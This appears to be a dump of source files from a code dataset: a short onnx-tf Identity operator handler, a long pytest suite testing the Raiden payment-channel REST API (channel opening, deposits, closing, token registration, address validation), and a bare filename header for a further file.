<filename>onnx_tf/handlers/backend/identity.py import tensorflow as tf from onnx_tf.handlers.backend_handler import BackendHandler from onnx_tf.handlers.handler import onnx_op from onnx_tf.handlers.handler import tf_func @onnx_op("Identity") @tf_func(tf.identity) class Identity(BackendHandler): @classmethod def version_1(cls, node, **kwargs): return [cls.make_tensor_from_onnx_node(node, **kwargs)] @classmethod def version_13(cls, node, **kwargs): return [cls.make_tensor_from_onnx_node(node, **kwargs)] @classmethod def version_14(cls, node, **kwargs): x = kwargs["tensor_dict"][node.inputs[0]] if isinstance(x, (list, tuple)): return [tf.identity_n(x)] else: return [tf.identity(x)]
2.109375
2
raiden/tests/integration/api/test_restapi.py
litexnetwork/raiden
1
16725
from http import HTTPStatus import time import logging import pytest import grequests from flask import url_for from eth_utils import ( to_checksum_address, to_canonical_address, is_checksum_address, ) from raiden_contracts.constants import ( CONTRACT_HUMAN_STANDARD_TOKEN, MAX_TOKENS_DEPLOY, TEST_SETTLE_TIMEOUT_MIN, TEST_SETTLE_TIMEOUT_MAX, ) from raiden.api.v1.encoding import ( AddressField, HexAddressConverter, ) from raiden.transfer.state import ( CHANNEL_STATE_OPENED, CHANNEL_STATE_CLOSED, ) from raiden.tests.utils import assert_dicts_are_equal from raiden.tests.utils.client import burn_all_eth from raiden.tests.utils.smartcontracts import deploy_contract_web3 # pylint: disable=too-many-locals,unused-argument,too-many-lines def assert_no_content_response(response): assert( response is not None and response.text == '' and response.status_code == HTTPStatus.NO_CONTENT ) def assert_response_with_code(response, status_code): assert ( response is not None and response.status_code == status_code ) def assert_response_with_error(response, status_code): assert ( response is not None and response.status_code == status_code and 'errors' in response.json() and response.json()['errors'] != '' ) def assert_proper_response(response, status_code=HTTPStatus.OK): assert ( response is not None and response.status_code == status_code and response.headers['Content-Type'] == 'application/json' ) def api_url_for(api_backend, endpoint, **kwargs): api_server, _ = api_backend # url_for() expects binary address so we have to convert here for key, val in kwargs.items(): if isinstance(val, str) and val.startswith('0x'): pass #kwargs[key] = to_canonical_address(val) with api_server.flask_app.app_context(): return url_for('v1_resources.{}'.format(endpoint), **kwargs) def test_hex_converter(): converter = HexAddressConverter(map=None) # invalid hex data with pytest.raises(Exception): converter.to_python('-') # invalid address, too short with pytest.raises(Exception): converter.to_python('0x1234') # missing prefix 0x with pytest.raises(Exception): converter.to_python('414d72a6f6e28f4950117696081450d63d56c354') address = b'AMr\xa6\xf6\xe2\x8fIP\x11v\x96\x08\x14P\xd6=V\xc3T' assert converter.to_python('0x414D72a6f6E28F4950117696081450d63D56C354') == address def test_address_field(): # pylint: disable=protected-access field = AddressField() attr = 'test' data = object() # invalid hex data with pytest.raises(Exception): field._deserialize('-', attr, data) # invalid address, too short with pytest.raises(Exception): field._deserialize('0x1234', attr, data) # missing prefix 0x with pytest.raises(Exception): field._deserialize('414d72a6f6e28f4950117696081450d63d56c354', attr, data) address = b'AMr\xa6\xf6\xe2\x8fIP\x11v\x96\x08\x14P\xd6=V\xc3T' assert field._deserialize('0x414D72a6f6E28F4950117696081450d63D56C354', attr, data) == address def test_url_with_invalid_address(rest_api_port_number, api_backend): """ Addresses require the leading 0x in the urls. """ url_without_prefix = ( 'http://localhost:{port}/api/1/' 'channels/ea674fdde714fd979de3edf0f56aa9716b898ec8' ).format(port=rest_api_port_number) request = grequests.patch( url_without_prefix, json=dict(state='CHANNEL_STATE_SETTLED'), ) response = request.send().response assert_response_with_code(response, HTTPStatus.NOT_FOUND) @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_payload_with_address_without_prefix(api_backend): """ Addresses require leading 0x in the payload. """ invalid_address = '61c808d82a3ac53231750dadc13c777b59310bd9' channel_data_obj = { 'partner_address': invalid_address, 'token_address': '0xEA674fdDe714fd979de3EdF0F56AA9716B898ec8', 'settle_timeout': 10, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_response_with_error(response, HTTPStatus.BAD_REQUEST) @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_payload_with_address_invalid_chars(api_backend): """ Addresses cannot have invalid characters in it. """ invalid_address = '0x61c808d82a3ac53231750dadc13c777b59310bdg' # g at the end is invalid channel_data_obj = { 'partner_address': invalid_address, 'token_address': '0xEA674fdDe714fd979de3EdF0F56AA9716B898ec8', 'settle_timeout': 10, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_response_with_error(response, HTTPStatus.BAD_REQUEST) @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_payload_with_address_invalid_length(api_backend): """ Encoded addresses must have the right length. """ invalid_address = '0x61c808d82a3ac53231750dadc13c777b59310b' # g at the end is invalid channel_data_obj = { 'partner_address': invalid_address, 'token_address': '0xEA674fdDe714fd979de3EdF0F56AA9716B898ec8', 'settle_timeout': 10, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_response_with_error(response, HTTPStatus.BAD_REQUEST) @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_payload_with_address_not_eip55(api_backend): """ Provided addresses must be EIP55 encoded. """ invalid_address = '0xf696209d2ca35e6c88e5b99b7cda3abf316bed69' channel_data_obj = { 'partner_address': invalid_address, 'token_address': '0xEA674fdDe714fd979de3EdF0F56AA9716B898ec8', 'settle_timeout': 90, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_response_with_error(response, HTTPStatus.BAD_REQUEST) @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_api_query_our_address(api_backend): request = grequests.get( api_url_for(api_backend, 'addressresource'), ) response = request.send().response assert_proper_response(response) api_server, _ = api_backend our_address = api_server.rest_api.raiden_api.address assert response.json() == {'our_address': to_checksum_address(our_address)} @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_api_get_channel_list( api_backend, token_addresses, reveal_timeout, ): partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' request = grequests.get( api_url_for( api_backend, 'channelsresource', ), ) response = request.send().response assert_proper_response(response, HTTPStatus.OK) assert response.json() == [] # let's create a new channel token_address = token_addresses[0] settle_timeout = 1650 channel_data_obj = { 'partner_address': partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, 'reveal_timeout': reveal_timeout, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.CREATED) request = grequests.get( api_url_for( api_backend, 'channelsresource', ), ) response = request.send().response assert_proper_response(response, HTTPStatus.OK) channel_info = response.json()[0] assert channel_info['partner_address'] == partner_address assert channel_info['token_address'] == to_checksum_address(token_address) assert 'token_network_identifier' in channel_info @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_api_channel_status_channel_nonexistant( api_backend, token_addresses, ): partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' token_address = token_addresses[0] request = grequests.get( api_url_for( api_backend, 'channelsresourcebytokenandpartneraddress', token_address=token_address, partner_address=partner_address, ), ) response = request.send().response assert_proper_response(response, HTTPStatus.NOT_FOUND) assert response.json()['errors'] == ( "Channel with partner '{}' for token '{}' could not be found.".format( to_checksum_address(partner_address), to_checksum_address(token_address), ) ) @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_api_open_and_deposit_channel( api_backend, token_addresses, reveal_timeout, ): # let's create a new channel first_partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' token_address = token_addresses[0] settle_timeout = 1650 channel_data_obj = { 'partner_address': first_partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, 'reveal_timeout': reveal_timeout, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.CREATED) response = response.json() expected_response = channel_data_obj expected_response['balance'] = 0 expected_response['state'] = CHANNEL_STATE_OPENED expected_response['channel_identifier'] = assert_dicts_are_equal.IGNORE_VALUE expected_response['token_network_identifier'] = assert_dicts_are_equal.IGNORE_VALUE assert_dicts_are_equal(response, expected_response) token_network_identifier = response['token_network_identifier'] # now let's open a channel and make a deposit too second_partner_address = '0x29FA6cf0Cce24582a9B20DB94Be4B6E017896038' balance = 100 channel_data_obj = { 'partner_address': second_partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, 'reveal_timeout': reveal_timeout, 'balance': balance, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.CREATED) response = response.json() expected_response = channel_data_obj expected_response['balance'] = balance expected_response['state'] = CHANNEL_STATE_OPENED expected_response['channel_identifier'] = assert_dicts_are_equal.IGNORE_VALUE expected_response['token_network_identifier'] = token_network_identifier assert_dicts_are_equal(response, expected_response) # let's deposit on the first channel request = grequests.patch( api_url_for( api_backend, 'channelsresourcebytokenandpartneraddress', token_address=token_address, partner_address=first_partner_address, ), json={'total_deposit': balance}, ) response = request.send().response assert_proper_response(response) response = response.json() expected_response = { 'channel_identifier': assert_dicts_are_equal.IGNORE_VALUE, 'partner_address': first_partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, 'reveal_timeout': reveal_timeout, 'state': CHANNEL_STATE_OPENED, 'balance': balance, 'token_network_identifier': token_network_identifier, } assert_dicts_are_equal(response, expected_response) # let's try querying for the second channel request = grequests.get( api_url_for( api_backend, 'channelsresourcebytokenandpartneraddress', token_address=token_address, partner_address=second_partner_address, ), ) response = request.send().response assert_proper_response(response) response = response.json() expected_response = { 'channel_identifier': assert_dicts_are_equal.IGNORE_VALUE, 'partner_address': second_partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, 'reveal_timeout': reveal_timeout, 'state': CHANNEL_STATE_OPENED, 'balance': balance, 'token_network_identifier': token_network_identifier, } assert_dicts_are_equal(response, expected_response) # finally let's burn all eth and try to open another channel api_server, _ = api_backend burn_all_eth(api_server.rest_api.raiden_api.raiden) channel_data_obj = { 'partner_address': '0xf3AF96F89b3d7CdcBE0C083690A28185Feb0b3CE', 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, 'reveal_timeout': reveal_timeout, 'balance': 1, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.PAYMENT_REQUIRED) response = response.json() assert 'Insufficient ETH' in response['errors'] @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_api_open_close_and_settle_channel( api_backend, token_addresses, reveal_timeout, ): # let's create a new channel partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' token_address = token_addresses[0] settle_timeout = 1650 channel_data_obj = { 'partner_address': partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response balance = 0 assert_proper_response(response, status_code=HTTPStatus.CREATED) response = response.json() expected_response = channel_data_obj expected_response['balance'] = balance expected_response['state'] = CHANNEL_STATE_OPENED expected_response['reveal_timeout'] = reveal_timeout expected_response['channel_identifier'] = assert_dicts_are_equal.IGNORE_VALUE expected_response['token_network_identifier'] = assert_dicts_are_equal.IGNORE_VALUE assert_dicts_are_equal(response, expected_response) token_network_identifier = response['token_network_identifier'] # let's close the channel request = grequests.patch( api_url_for( api_backend, 'channelsresourcebytokenandpartneraddress', token_address=token_address, partner_address=partner_address, ), json={'state': CHANNEL_STATE_CLOSED}, ) response = request.send().response assert_proper_response(response) expected_response = { 'token_network_identifier': token_network_identifier, 'channel_identifier': assert_dicts_are_equal.IGNORE_VALUE, 'partner_address': partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, 'reveal_timeout': reveal_timeout, 'state': CHANNEL_STATE_CLOSED, 'balance': balance, } assert_dicts_are_equal(response.json(), expected_response) def test_api_close_insufficient_eth( api_backend, token_addresses, reveal_timeout, ): # let's create a new channel partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' token_address = token_addresses[0] settle_timeout = 1650 channel_data_obj = { 'partner_address': partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response balance = 0 assert_proper_response(response, status_code=HTTPStatus.CREATED) response = response.json() expected_response = channel_data_obj expected_response['balance'] = balance expected_response['state'] = CHANNEL_STATE_OPENED expected_response['reveal_timeout'] = reveal_timeout expected_response['channel_identifier'] = assert_dicts_are_equal.IGNORE_VALUE expected_response['token_network_identifier'] = assert_dicts_are_equal.IGNORE_VALUE assert_dicts_are_equal(response, expected_response) # let's burn all eth and try to close the channel api_server, _ = api_backend burn_all_eth(api_server.rest_api.raiden_api.raiden) request = grequests.patch( api_url_for( api_backend, 'channelsresourcebytokenandpartneraddress', token_address=token_address, partner_address=partner_address, ), json={'state': CHANNEL_STATE_CLOSED}, ) response = request.send().response assert_proper_response(response, HTTPStatus.PAYMENT_REQUIRED) response = response.json() assert 'Insufficient ETH' in response['errors'] @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_api_open_channel_invalid_input( api_backend, token_addresses, reveal_timeout, ): partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' token_address = token_addresses[0] settle_timeout = TEST_SETTLE_TIMEOUT_MIN - 1 channel_data_obj = { 'partner_address': partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, 'reveal_timeout': reveal_timeout, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_response_with_error(response, status_code=HTTPStatus.CONFLICT) channel_data_obj['settle_timeout'] = TEST_SETTLE_TIMEOUT_MAX + 1 request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_response_with_error(response, status_code=HTTPStatus.CONFLICT) @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_api_channel_state_change_errors( api_backend, token_addresses, reveal_timeout, ): partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' token_address = token_addresses[0] settle_timeout = 1650 channel_data_obj = { 'partner_address': partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, 'reveal_timeout': reveal_timeout, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.CREATED) # let's try to set a random state request = grequests.patch( api_url_for( api_backend, 'channelsresourcebytokenandpartneraddress', token_address=token_address, partner_address=partner_address, ), json=dict(state='inlimbo'), ) response = request.send().response assert_response_with_error(response, HTTPStatus.BAD_REQUEST) # let's try to set both new state and balance request = grequests.patch( api_url_for( api_backend, 'channelsresourcebytokenandpartneraddress', token_address=token_address, partner_address=partner_address, ), json=dict(state=CHANNEL_STATE_CLOSED, total_deposit=200), ) response = request.send().response assert_response_with_error(response, HTTPStatus.CONFLICT) # let's try to patch with no arguments request = grequests.patch( api_url_for( api_backend, 'channelsresourcebytokenandpartneraddress', token_address=token_address, partner_address=partner_address, ), ) response = request.send().response assert_response_with_error(response, HTTPStatus.BAD_REQUEST) # ok now let's close and settle for real request = grequests.patch( api_url_for( api_backend, 'channelsresourcebytokenandpartneraddress', token_address=token_address, partner_address=partner_address, ), json=dict(state=CHANNEL_STATE_CLOSED), ) response = request.send().response assert_proper_response(response) # let's try to deposit to a settled channel request = grequests.patch( api_url_for( api_backend, 'channelsresourcebytokenandpartneraddress', token_address=token_address, partner_address=partner_address, ), json=dict(total_deposit=500), ) response = request.send().response assert_response_with_error(response, HTTPStatus.CONFLICT) @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) @pytest.mark.parametrize('number_of_tokens', [2]) def test_api_tokens(api_backend, blockchain_services, token_addresses): partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' token_address1 = token_addresses[0] token_address2 = token_addresses[1] settle_timeout = 1650 channel_data_obj = { 'partner_address': partner_address, 'token_address': to_checksum_address(token_address1), 'settle_timeout': settle_timeout, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.CREATED) partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' settle_timeout = 1650 channel_data_obj = { 'partner_address': partner_address, 'token_address': to_checksum_address(token_address2), 'settle_timeout': settle_timeout, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.CREATED) # and now let's get the token list request = grequests.get( api_url_for( api_backend, 'tokensresource', ), ) response = request.send().response assert_proper_response(response) response = response.json() expected_response = [ to_checksum_address(token_address1), to_checksum_address(token_address2), ] assert set(response) == set(expected_response) @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_query_partners_by_token(api_backend, blockchain_services, token_addresses): first_partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' second_partner_address = '0x29FA6cf0Cce24582a9B20DB94Be4B6E017896038' token_address = token_addresses[0] settle_timeout = 1650 channel_data_obj = { 'partner_address': first_partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.CREATED) response = response.json() channel_data_obj['partner_address'] = second_partner_address request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.CREATED) response = response.json() # and a channel for another token channel_data_obj['partner_address'] = '0xb07937AbA15304FBBB0Bf6454a9377a76E3dD39E' channel_data_obj['token_address'] = to_checksum_address(token_address) request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.CREATED) # and now let's query our partners per token for the first token request = grequests.get( api_url_for( api_backend, 'partnersresourcebytokenaddress', token_address=to_checksum_address(token_address), ), ) response = request.send().response assert_proper_response(response) response = response.json() expected_response = [ { 'partner_address': first_partner_address, 'channel': '/api/1/channels/{}/{}'.format( to_checksum_address(token_address), to_checksum_address(first_partner_address), ), }, { 'partner_address': second_partner_address, 'channel': '/api/1/channels/{}/{}'.format( to_checksum_address(token_address), to_checksum_address(second_partner_address), ), }, ] assert all(r in response for r in expected_response) @pytest.mark.parametrize('number_of_nodes', [2]) def test_api_transfers(api_backend, raiden_network, token_addresses): _, app1 = raiden_network amount = 200 identifier = 42 token_address = token_addresses[0] target_address = app1.raiden.address api_server, _ = api_backend our_address = api_server.rest_api.raiden_api.address transfer = { 'initiator_address': to_checksum_address(our_address), 'target_address': to_checksum_address(target_address), 'token_address': to_checksum_address(token_address), 'amount': amount, 'identifier': identifier, } request = grequests.post( api_url_for( api_backend, 'transfertotargetresource', token_address=to_checksum_address(token_address), target_address=to_checksum_address(target_address), ), json={'amount': amount, 'identifier': identifier}, ) response = request.send().response assert_proper_response(response) response = response.json() assert response == transfer #demo @pytest.mark.parametrize('number_of_nodes', [2]) def test_api_crosstransactiontry(api_backend, raiden_network, token_addresses): _, app1 = raiden_network raiden = _.raiden sendETH_amount = 101 sendBTC_amount =2 receiveBTC_address = "1JnC15WwDVcC3QbQRUY6ChqRLucLpTGaJN" token_address = token_addresses[0] target_address = app1.raiden.address api_server, _ = api_backend our_address = api_server.rest_api.raiden_api.address crosstransaction = { 'initiator_address': to_checksum_address(our_address), 'target_address': to_checksum_address(target_address), 'token_address': to_checksum_address(token_address), 'sendETH_amount': sendETH_amount, 'sendBTC_amount': sendBTC_amount, 'receiveBTC_address':receiveBTC_address, } request = grequests.post( api_url_for( api_backend, 'crosstransactiontry', token_address=to_checksum_address(token_address), target_address=to_checksum_address(target_address), ), json={'initiator_address': to_checksum_address(our_address), 'sendETH_amount': sendETH_amount,'sendBTC_amount':sendBTC_amount,'receiveBTC_address':receiveBTC_address}, ) response = request.send().response time.sleep(10) hash_r = raiden.wal.storage.get_all_crosstransaction()[0][9] test_api_crosstransation_hash(api_backend,raiden_network,token_address,hash_r) assert_proper_response(response) response = response.json() assert response == crosstransaction #demo @pytest.mark.parametrize('number_of_nodes', [2]) def test_api_getcrosstransation(api_backend, raiden_network, token_addresses): _, app1 = raiden_network api_server, _ = api_backend raiden = app1.raiden test_api_crosstransactiontry(api_backend,raiden_network,token_addresses) request = grequests.get( api_url_for( api_backend, 'getcrosstransaction', ) ) response = request.send().response assert_proper_response(response, HTTPStatus.OK) logging.debug(response) assert response.json() != [] #test getcrosstransation_by_id cross_id = response.json()[0]['crossid'] test_api_getcrosstransation_by_id(api_backend,raiden_network,token_addresses,cross_id) def test_api_getcrosstransation_by_id(api_backend, raiden_network, token_addresses,cross_id): _, app1 = raiden_network api_server, _ = api_backend cross_id = cross_id request = grequests.get( api_url_for( api_backend, 'getcrosstransactionbyid', cross_id = cross_id, ) ) response = request.send().response assert_proper_response(response, HTTPStatus.OK) assert response.json() != [] def test_api_crosstransation_hash(api_backend, raiden_network, token_addresses,hash_r): _, app1 = raiden_network api_server, _ = api_backend hash_r = str(hash_r) request = grequests.get( api_url_for( api_backend, 'recivehashresource', hash_r = hash_r, ) ) response = request.send().response assert_proper_response(response, HTTPStatus.OK) assert response.json() == 'hash_r is ok' @pytest.mark.parametrize('number_of_tokens', [0]) @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_register_token(api_backend, token_amount, token_addresses, raiden_network): app0 = raiden_network[0] new_token_address = deploy_contract_web3( CONTRACT_HUMAN_STANDARD_TOKEN, app0.raiden.chain.client, num_confirmations=None, constructor_arguments=( token_amount, 2, 'raiden', 'Rd', ), ) other_token_address = deploy_contract_web3( CONTRACT_HUMAN_STANDARD_TOKEN, app0.raiden.chain.client, num_confirmations=None, constructor_arguments=( token_amount, 2, 'raiden', 'Rd', ), ) register_request = grequests.put(api_url_for( api_backend, 'registertokenresource', token_address=to_checksum_address(new_token_address), )) register_response = register_request.send().response assert_proper_response(register_response, status_code=HTTPStatus.CREATED) response_json = register_response.json() assert 'token_network_address' in response_json assert is_checksum_address(response_json['token_network_address']) # now try to reregister it and get the error conflict_request = grequests.put(api_url_for( api_backend, 'registertokenresource', token_address=to_checksum_address(new_token_address), )) conflict_response = conflict_request.send().response assert_response_with_error(conflict_response, HTTPStatus.CONFLICT) # Burn all the eth and then make sure we get the appropriate API error burn_all_eth(app0.raiden) poor_request = grequests.put(api_url_for( api_backend, 'registertokenresource', token_address=to_checksum_address(other_token_address), )) poor_response = poor_request.send().response assert_response_with_error(poor_response, HTTPStatus.PAYMENT_REQUIRED) @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) @pytest.mark.parametrize('number_of_tokens', [2]) def test_get_connection_managers_info(api_backend, token_addresses): # check that there are no registered tokens request = grequests.get( api_url_for(api_backend, 'connectionsinforesource'), ) response = request.send().response result = response.json() assert len(result) == 0 funds = 100 token_address1 = to_checksum_address(token_addresses[0]) connect_data_obj = { 'funds': funds, } request = grequests.put( api_url_for( api_backend, 'connectionsresource', token_address=token_address1, ), json=connect_data_obj, ) response = request.send().response assert_no_content_response(response) # check that there now is one registered channel manager request = grequests.get( api_url_for(api_backend, 'connectionsinforesource'), ) response = request.send().response result = response.json() assert isinstance(result, dict) and len(result.keys()) == 1 assert token_address1 in result assert isinstance(result[token_address1], dict) assert set(result[token_address1].keys()) == {'funds', 'sum_deposits', 'channels'} funds = 100 token_address2 = to_checksum_address(token_addresses[1]) connect_data_obj = { 'funds': funds, } request = grequests.put( api_url_for( api_backend, 'connectionsresource', token_address=token_address2, ), json=connect_data_obj, ) response = request.send().response assert_no_content_response(response) # check that there now are two registered channel managers request = grequests.get( api_url_for(api_backend, 'connectionsinforesource'), ) response = request.send().response result = response.json() assert isinstance(result, dict) and len(result.keys()) == 2 assert token_address2 in result assert isinstance(result[token_address2], dict) assert set(result[token_address2].keys()) == {'funds', 'sum_deposits', 'channels'} @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) @pytest.mark.parametrize('number_of_tokens', [2]) def test_connect_insufficient_eth(api_backend, token_addresses): # Burn all eth and then try to connect to a token network api_server, _ = api_backend burn_all_eth(api_server.rest_api.raiden_api.raiden) funds = 100 token_address1 = to_checksum_address(token_addresses[0]) connect_data_obj = { 'funds': funds, } request = grequests.put( api_url_for( api_backend, 'connectionsresource', token_address=token_address1, ), json=connect_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.PAYMENT_REQUIRED) response = response.json() assert 'Insufficient ETH' in response['errors'] @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_network_events(api_backend, token_addresses): # let's create a new channel partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' token_address = token_addresses[0] settle_timeout = 1650 channel_data_obj = { 'partner_address': partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, status_code=HTTPStatus.CREATED) request = grequests.get( api_url_for( api_backend, 'networkeventsresource', from_block=0, ), ) response = request.send().response assert_proper_response(response, status_code=HTTPStatus.OK) assert len(response.json()) > 0 @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_token_events(api_backend, token_addresses): # let's create a new channel partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' token_address = token_addresses[0] settle_timeout = 1650 channel_data_obj = { 'partner_address': partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, status_code=HTTPStatus.CREATED) request = grequests.get( api_url_for( api_backend, 'tokeneventsresource', token_address=token_address, from_block=0, ), ) response = request.send().response assert_proper_response(response, status_code=HTTPStatus.OK) assert len(response.json()) > 0 @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_channel_events(api_backend, token_addresses): # let's create a new channel partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' token_address = token_addresses[0] settle_timeout = 1650 channel_data_obj = { 'partner_address': partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, status_code=HTTPStatus.CREATED) request = grequests.get( api_url_for( api_backend, 'channeleventsresource', partner_address=partner_address, token_address=token_address, from_block=0, ), ) response = request.send().response assert_proper_response(response, status_code=HTTPStatus.OK) assert len(response.json()) > 0 @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_token_events_errors_for_unregistered_token(api_backend): request = grequests.get( api_url_for( api_backend, 'tokeneventsresource', token_address='<KEY>', from_block=5, to_block=20, ), ) response = request.send().response assert_response_with_error(response, status_code=HTTPStatus.NOT_FOUND) @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) @pytest.mark.parametrize('deposit', [50000]) def test_api_deposit_limit( api_backend, token_addresses, reveal_timeout, ): # let's create a new channel and deposit exactly the limit amount first_partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' token_address = token_addresses[0] settle_timeout = 1650 balance_working = MAX_TOKENS_DEPLOY * (10 ** 2) # token has two digits channel_data_obj = { 'partner_address': first_partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, 'reveal_timeout': reveal_timeout, 'balance': balance_working, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.CREATED) response = response.json() expected_response = channel_data_obj expected_response['balance'] = balance_working expected_response['state'] = CHANNEL_STATE_OPENED expected_response['channel_identifier'] = assert_dicts_are_equal.IGNORE_VALUE expected_response['token_network_identifier'] = assert_dicts_are_equal.IGNORE_VALUE assert_dicts_are_equal(response, expected_response) # now let's open a channel and deposit a bit more than the limit second_partner_address = '0x29FA6cf0Cce24582a9B20DB94Be4B6E017896038' balance_failing = balance_working + 1 # token has two digits channel_data_obj = { 'partner_address': second_partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, 'reveal_timeout': reveal_timeout, 'balance': balance_failing, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.CONFLICT) response = response.json() assert response['errors'] == 'The deposit of 10001 is bigger than the current limit of 10000'
2.0625
2
contents/MyExperiment/Exp3_test/cluster_env.py
Feng-XiaoYue/Reinforcement-learning-with-tensorflow-master
0
16726
